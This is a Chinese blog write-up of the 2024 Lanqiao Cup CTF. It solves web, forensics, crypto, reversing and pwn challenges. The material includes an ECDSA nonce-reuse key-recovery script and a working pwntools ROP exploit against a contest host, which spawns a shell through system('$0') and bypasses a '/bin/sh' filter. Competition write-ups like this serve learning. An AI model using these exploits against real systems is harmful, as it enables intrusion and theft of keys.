2024第十五届蓝桥杯网络安全赛项WriteUp

已于 2024-04-27 16:45:25 修改
阅读量847 收藏 16
点赞数 8
文章标签: 蓝桥杯 web安全 网络安全 CTF竞赛 CTF 安全
于 2024-04-27 16:45:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AtomTeam/article/details/138252682
版权

欢迎关注公众号【Real返璞归真】回复【蓝桥杯2024】获取完整题目附件。

排名

img

安全知识

错1个选择题,题目说的不清楚,没搞懂题意。肯定不能用eval。错了理论题有点遗憾。

没想到这题前端是要解析json数据,排除CD选了A,结果发现正确答案选C。

image-20240427160134547

情报收集

爬虫协议

Web方向的签到题,题目提示的很明显,进去还有个Robots,直接访问网站robots.txt文件:

image-20240427120954424

访问最后一个限制爬虫的可疑目录,直接得到Flag:

image-20240427121155580

数据分析

packet

Misc方向的签到题,找到POST请求,发现是命令执行cat flag,返回Base64后的flag:

image-20240427121346223

直接解Base64得到Flag:

image-20240427121717368

缺失的数据

压缩包里给了字典,直接用ARCHPR爆破后得到解压密码。

解压得到原图,并且有了加密后的图片,根据代码里的key和参数直接运行脚本解密水印图片:

image-20240427144632724 
import cv2
import numpy as np
import pywt


class WaterMarkDWT:
    def __init__(self, origin: str, watermark: str, key: int, weight: list):
        self.key = key
        self.img = cv2.imread(origin)
        self.mark = cv2.imread(watermark)
        self.coef = weight

    def arnold(self, img):
        r, c = img.shape
        p = np.zeros((r, c), np.uint8)

        a, b = 1, 1
        for k in range(self.key):
            for i in range(r):
                for j in range(c):
                    x = (i + b * j) % r
                    y = (a * i + (a * b + 1) * j) % c
                    p[x, y] = img[i, j]
        return p

    def deArnold(self, img):
        r, c = img.shape
        p = np.zeros((r, c), np.uint8)

        a, b = 1, 1
        for k in range(self.key):
            for i in range(r):
                for j in range(c):
                    x = ((a * b + 1) * i - b * j) % r
                    y = (-a * i + j) % c
                    p[x, y] = img[i, j]
        return p

    def get(self, size: tuple = (1200, 1200), flag: int = None):
        img = cv2.resize(self.img, size)

        img1 = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
        img2 = cv2.cvtColor(self.mark, cv2.COLOR_RGB2GRAY)

        c = pywt.wavedec2(img2, 'db2', level=3)
        [cl, (cH3, cV3, cD3), (cH2, cV2, cD2), (cH1, cV1, cD1)] = c

        d = pywt.wavedec2(img1, 'db2', level=3)
        [dl, (dH3, dV3, dD3), (dH2, dV2, dD2), (dH1, dV1, dD1)] = d

        a1, a2, a3, a4 = self.coef

        ca1 = (cl - dl) * a1
        ch1 = (cH3 - dH3) * a2
        cv1 = (cV3 - dV3) * a3
        cd1 = (cD3 - dD3) * a4

        # Ensure all coefficients have the same shape
        ca1 = cv2.resize(ca1, (cD3.shape[1], cD3.shape[0]))

        waterImg = pywt.waverec2([ca1, (ch1, cv1, cd1)], 'db2')
        waterImg = np.array(waterImg, np.uint8)

        waterImg = self.deArnold(waterImg)

        kernel = np.ones((3, 3), np.uint8)
        if flag == 0:
            waterImg = cv2.erode(waterImg, kernel)
        elif flag == 1:
            waterImg = cv2.dilate(waterImg, kernel)

        return waterImg


if __name__ == '__main__':
    img = 'a.png'
    watermark = 'newImg.png'
    
    k = 20
    xs = [0.2, 0.2, 0.5, 0.4]
    
    W1 = WaterMarkDWT(img, watermark, k, xs)
    extracted_watermark = W1.get()
    cv2.imwrite('提取出的水印.png', extracted_watermark)

密码破解

cc

image-20240427122506413

和去年的签到题一样,有了key和iv,直接在CyberChef用AES解密回去即可:

image-20240427122603006

Theorem

密码方向的签到题,根据题目已知n、e和c,并且p和q是相邻的素数,可以考虑分解。

通过prevprime函数分解n,然后RSA解密即可:

from Crypto.Util.number import long_to_bytes
import gmpy2
import libnum

from sympy import prevprime

e = 65537
n = 94581028682900113123648734937784634645486813867065294159875516514520556881461611966096883566806571691879115766917833117123695776131443081658364855087575006641022211136751071900710589699171982563753011439999297865781908255529833932820965169382130385236359802696280004495552191520878864368741633686036192501791
c = 36423517465893675519815622861961872192784685202298519340922692662559402449554596309518386263035128551037586034375613936036935256444185038640625700728791201299960866688949056632874866621825012134973285965672502404517179243752689740766636653543223559495428281042737266438408338914031484466542505299050233075829

# 分解n
p = prevprime(gmpy2.iroot(n,2)[0])
q = n // p

# 求d
d = gmpy2.invert(e,(p-1) * (q-1))

print(long_to_bytes(pow(c,d,n)))

Signature

椭圆曲线密码中的签名整数k相同攻击利用。

因为k值相同,所以r值也是相同的。

题目中给到了使用相同的k进行两次签名的结果,那根据:

s1 = k^-1 (z1 + rda) mod n
s2 = k^-1 (z2 + rda) mod n
s1 - s2 = k^-1 (z1 - z2) mod n
K = (s1-s2)^-1 * (z1 -z2) mod n

得到k,最后再代入原式便能解出da了,即本题中的flag,完整exp:

from gmpy2 import *
from Crypto.Util.number import *
from hashlib import *

n= 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141

r1 = 4690192503304946823926998585663150874421527890534303129755098666293734606680
r2 = 4690192503304946823926998585663150874421527890534303129755098666293734606680
s1 = 111157363347893999914897601390136910031659525525419989250638426589503279490788
s2 = 74486305819584508240056247318325239805160339288252987178597122489325719901254
 
z1 = sha1(b'Hi.').digest()
z2 = sha1(b'hello.').digest()
s1_1 = inverse(s1, n)
s2_1 = inverse(s2, n)

def check(key):
    for i in range(len(key)):
        if key[i] < 32 or key[i] > 127:
            return 0
    return 1
 
x = (s2_1*bytes_to_long(z2) - s1_1*bytes_to_long(z1))%n
key = x*inverse(s1_1*r1-s2_1*r2, n)%n

print(key)

逆向分析

欢乐时光

加密是44个字节,但存储输入的大小只有42个字节,当然输入也就是最多42字节了,感觉这里是有点问题的,虽然多余的2个字节是用\0x填充。
image-20240427120415373
加密就是魔改xxtea,修改了加密的轮数,下面代码中的参数v9:

__int64 __fastcall cry(_DWORD *a1, int a2, __int64 a3)
{
  unsigned int *v3; // rax
  _DWORD *v4; // rax
  __int64 result; // rax
  unsigned int v6; // [rsp+20h] [rbp-18h]
  unsigned int v7; // [rsp+24h] [rbp-14h]
  unsigned int i; // [rsp+28h] [rbp-10h]
  int v9; // [rsp+2Ch] [rbp-Ch]
  int v10; // [rsp+30h] [rbp-8h]
  unsigned int v11; // [rsp+34h] [rbp-4h]

  v9 = 415 / a2 + 114;
  v7 = 0;
  v6 = a1[a2 - 1];
  do
  {
    v7 -= 0x61C88647;
    v10 = (v7 >> 2) & 3;
    for ( i = 0; i < a2 - 1; ++i )
    {
      v11 = a1[i + 1];
      v3 = &a1[i];
      *v3 += ((v11 ^ v7) + (v6 ^ *(_DWORD *)(4LL * (v10 ^ i & 3) + a3))) ^ (((4 * v11) ^ (v6 >> 5))
                                                                          + ((v11 >> 3) ^ (16 * v6)));
      v6 = *v3;
    }
    v4 = &a1[a2 - 1];
    *v4 += ((*a1 ^ v7) + (v6 ^ *(_DWORD *)(4LL * (v10 ^ i & 3) + a3))) ^ (((4 * *a1) ^ (v6 >> 5))
                                                                        + ((*a1 >> 3) ^ (16 * v6)));
    result = (unsigned int)*v4;
    v6 = result;
    --v9;
  }
  while ( v9 );
  return result;
}

xxTEA,直接逆回去解密:

#include <stdio.h>  
#include <stdint.h>  
#define DELTA 0x9e3779b9  
#define MX (((z>>5^y<<2) + (y>>3^z<<4)) ^ ((sum^y) + (key[(p&3)^e] ^ z)))  
  
void btea(uint32_t *v, int n, uint32_t const key[4])  
{  
    uint32_t y, z, sum;  
    unsigned p, rounds, e;  
    if (n > 1)            
    {  
        rounds = 6 + 52/n;  
        sum = 0;  
        z = v[n-1];  
        do  
        {  
            sum += DELTA;  
            e = (sum >> 2) & 3;  
            for (p=0; p<n-1; p++)  
            {  
                y = v[p+1];  
                z = v[p] += MX;  
            }  
            y = v[0];  
            z = v[n-1] += MX;  
        }  
        while (--rounds);  
    }  
    else if (n < -1) 
    {  
        n = -n;  
        rounds = 114 + 415/n;  
        sum = rounds*DELTA;  
        y = v[0];  
        do  
        {  
            e = (sum >> 2) & 3;  
            for (p=n-1; p>0; p--)  
            {  
                z = v[p-1];  
                y = v[p] -= MX;  
            }  
            z = v[n-1];  
            y = v[0] -= MX;  
            sum -= DELTA;  
        }  
        while (--rounds);  
    }  
}  
  
int main()  
{  
    uint32_t v[]= {1208664588, 3465558002, 2350981144, 244490637, 2751681140, 611560113, 2851068760, 2771174856, 3828534097, 3494810147, 1875931283, 0};  
    uint32_t const k[4]= {2036950869, 1731489644, 1763906097, 1600602673};  
    int n = 11;

    btea(v, -n, k);
    for(int i = 0; i < sizeof(v); i++)
    {
    	printf("%d, ", ((char *)v)[i]);
	}
    puts((char *)v);
	 
    return 0;  
}

rc4

拖入IDA分析,和去年的题差不多,给了key和data,然后执行rc4加密函数:

image-20240427124243613

只不过没把结果输出,加密的结果存在了a3变量位置,函数结束前打断点动态调试:

image-20240427124604511

直接在a3的位置找到了flag:

image-20240427124528689

漏洞分析

fd

看来打pwn的师傅还是少,签到pwn题。

拖入IDA分析:

image-20240427122814676

首先读取最多14个字符到bss段的变量info中,然后读取最多0x4B到栈变量。

并且继续寻找发现程序提供了system函数,显而易见,直接ret2shellcode。

如果就这样结束了,这题一定被冲烂了。程序加了一个限制check函数:

image-20240427123031063

不能使用/binsh、/sh、cat等字符串作为system参数,因此可以使用$0启动shell。

但是又存在一个问题,close(1)关闭了stdout,因此需要将stdout重定向到stderr使正常输出。

完整exp如下:

from pwn import *

context(arch = 'amd64', os = 'linux', log_level = 'debug')

io = remote('47.93.143.29', '25923')
elf = ELF('./fd')

bss = 0x601090
system = elf.plt['system']
pop_rdi_ret = 0x400933
ret = 0x4005ae

# shellcode
io.send(b'$0')

# ret2shellcode
payload = b'A'*0x20 + b'deadbeef' + p64(ret) + p64(pop_rdi_ret) + p64(bss) + p64(system)
io.send(payload)

# getFlag
io.send(b'cat /flag 1 > &2')

io.interactive()
Real返璞归真
关注
  • 8
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
第四届红帽杯网络安全大赛-线上赛Writeup1
08-03
第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛 - 线上赛 Writeup 第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛-
2024 高校网络安全管理运维赛 Writeup.pdf
05-16
2024 高校网络安全管理运维赛 Writeup.pdf
2024第十五届蓝桥杯网络安全赛项部分题目 WriteUp
CHTXRT的博客
04-28 548
根据提示,访问/robots.txt,得到敏感路径 /38063b612387b10e22f4bd0d71a46a4e/,访问其中的/9de33df789dc91e984a091e6dce2dfb1得到flag。
第十五届蓝桥杯网络安全赛项 ezjava writeup
weixin_45936149的博客
04-27 739
第15届蓝桥杯ezjava writeup
2024第十五届蓝桥杯网络安全赛项部分题目 WriteUp_2024蓝桥杯ctf
2401_84969951的博客
05-16 250
根据提示,访问/robots.txt,得到敏感路径 /38063b612387b10e22f4bd0d71a46a4e/,访问其中的/9de33df789dc91e984a091e6dce2dfb1得到flag。根据提示可知为RC4加密,分析程序,猜测Str为密码,v5为密文,将v5转为unsigned char后利用脚本解密可得flag。
2024年---第十五届蓝桥杯网络安全CTF赛道部分WP
ctfayang的博客
05-09 472
本文章为第十五届蓝桥杯网络安全赛个人赛赛题详解,后期将会持续不断的更新。大家如果有兴趣进一步深入学习CTF,可访问网址进行联系或者添加二维码报名参加CTF培训班。我们的教师团队均来自CTF省赛、市赛前十名选手,通过顶尖战队的手把手指导,大家学完之后即可达到省赛、市赛的夺奖水平。
2020 第三届江西省高校网络安全技能大赛 线上赛Writeup
末初的CSDN博客
08-29 6040
第三届江西省高校网络安全技能大赛 线上赛Writeup
第十四届全国大学生信息安全竞赛-线上赛Writeup
热门推荐
末初的CSDN博客
05-16 1万+
第十四届全国大学生信息安全竞赛
第十五届全国大学生信息安全竞赛部分WriteUp
Tajang的大千世界
05-30 2478
CTF高考
第三届第五空间网络安全大赛-选拔赛-部分Writeup
末初的CSDN博客
09-17 1992
文章目录MISC签到alpha10BabyMimuzikoWEBWebFTPPNG图片转换器pklovecloudEasyCleanupyet_another_mysql_injection MISC 签到 flag{welcometo5space} alpha10 BabyMi muziko WEB WebFTP 目录扫描发现git泄露 使用GitHack尝试还原代码 发现无法还原源代码,但是发现了几个可以正常访问的文件,其中最为有用的就是这个探针:/Readme/mytz.php
2024第一届帕鲁杯应急响应挑战赛-Writeup
qq_58833765的博客
04-22 1919
直接开始解密发现这是一条付费记录(话不多说直接购买),没办法,只能遍历md5看能不能碰运气,最后发现文件名就是他的md5值的前半段。登录PC02查看到很多非系统用户,除去公司员工用户(中文名),系统用户,判断其余用户可能为恶意用户。通过堡垒机查看webserver会话记录分析,该ip请求繁多,时间段较长,分析可能为攻击ip。直接把附件exe拖到ida分析动态调试,下断点,看验证码,直接把验证改了,基操,ez~通过查看堡垒机会话记录的监控,查看攻击者视角,得出钓鱼文件。
2024年第十七届全国大学生信息安全竞赛创新实践能力赛初赛部分Writeup
最新发布
05-27
2024年第十七届全国大学生信息安全竞赛创新实践能力赛初赛部分Writeup解析部分题目
2021一带一路暨金砖大赛之企业信息系统安全赛项AWD-writeup(解析)
12-18
通过赛项检验参赛选手网络组建、安全架构和网络安全运维管控等 方面的技术技能,检验参赛队组织和团队协作等综合职业素养,培养学 生创新能力和实践动手能力,提升学生职业能力和就业竞争力。通过大 赛引领专业教学...
2024年江苏省信息安全评估与管理省赛样题(内含一阶段writeup)
01-10
2024年江苏省信息安全评估与管理省赛样题(内含一阶段writeup)2024年江苏省信息安全评估与管理省赛样题(内涵d一阶段writeup) 2024年江苏省信息安全评估与管理省赛样题(内涵d一阶段writeup) 2024年江苏省信息安全评估...
[蓝桥杯 2020 省 A1] 超级胶水
m0_53295313的博客
05-18 1298
小明有颗石子,按顺序摆成一排。他准备用胶水将这些石子粘在一起。每颗石子有自己的重量,如果将两颗石子粘在一起,将合并成一颗新的石子,重量是这两颗石子的重量之和。为了保证石子粘贴牢固,粘贴两颗石子所需要的胶水与两颗石子的重量乘积成正比,本题不考虑物理单位,认为所需要的胶水在数值上等于两颗石子重量的乘积。每次合并,小明只能合并位置相邻的两颗石子,并将合并出的新石子放在原来的位置。现在,小明想用最少的胶水将所有石子粘在一起,请帮助小明计算最少需要多少胶水。
积木搭建楼梯-第13届蓝桥杯选拔赛Python真题精选
超平的编程课
05-21 708
积木搭建楼梯,本题是2021年8月14日举办的第13届蓝桥杯青少组Python编程选拔赛真题。题目要求按照描述的规律搭建楼梯,请编程计算使用n块积木可以搭建几层完整的楼梯。本题非常简单,代码也不多,注意两个细节,一是循环的结束条件,要考虑相等的情况,二是循环结束后,需要将楼层减去1。
CTF网络安全大赛简单web题目:eval
Pythonit教程网
05-17 1099
(错误控制运算符)等可能引发安全问题的函数。这个PHP脚本有几个关键部分,但首先,它是不安全的,因为使用了。红客网:blog.hongkewang.cn。只需要在web的url后面加上参数“题目来源于:bugku。一道简单web的题目。
CTF网络安全大赛简单的web抓包题目:HEADache
Pythonit教程网
05-20 671
题目 描  述: > Wanna learn about some types of headache?红客网:blog.hongkewang.cn。”,就能获取到flag,完成题目了。直接在抓包到的页面添加请求头“题目来源于:bugku。
蓝帽杯全国大学生网络安全技能大赛
08-24
蓝帽杯全国大学生网络安全技能大赛是一项面向全国大学生的网络安全竞赛。该比赛旨在提升大学生的网络安全技能和意识,促进网络安全人才的培养。比赛内容涵盖了各个领域的网络安全知识和技能,包括但不限于电子取证、加密通道、Web安全等方面。 该比赛提供了一系列赛题和附件,选手需要根据题目要求进行解答和实践。例如,电子取证赛题中,选手需要完成对手机取证的任务,通过分析附件中的数据和信息来获取所需的证据[2]。还有其他赛题如加密的通道和Web安全等,选手需要运用相关的知识和技能来解决问题。蓝帽杯全国大学生网络安全技能大赛为大学生提供了锻炼和展示自己网络安全能力的平台,也为培养网络安全人才作出了积极的贡献。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [[ CTF ]【天格】战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)](https://blog.csdn.net/ZXW_NUDT/article/details/126173643)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [[ CTF ]天机战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(初赛)](https://blog.csdn.net/ZXW_NUDT/article/details/125715546)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值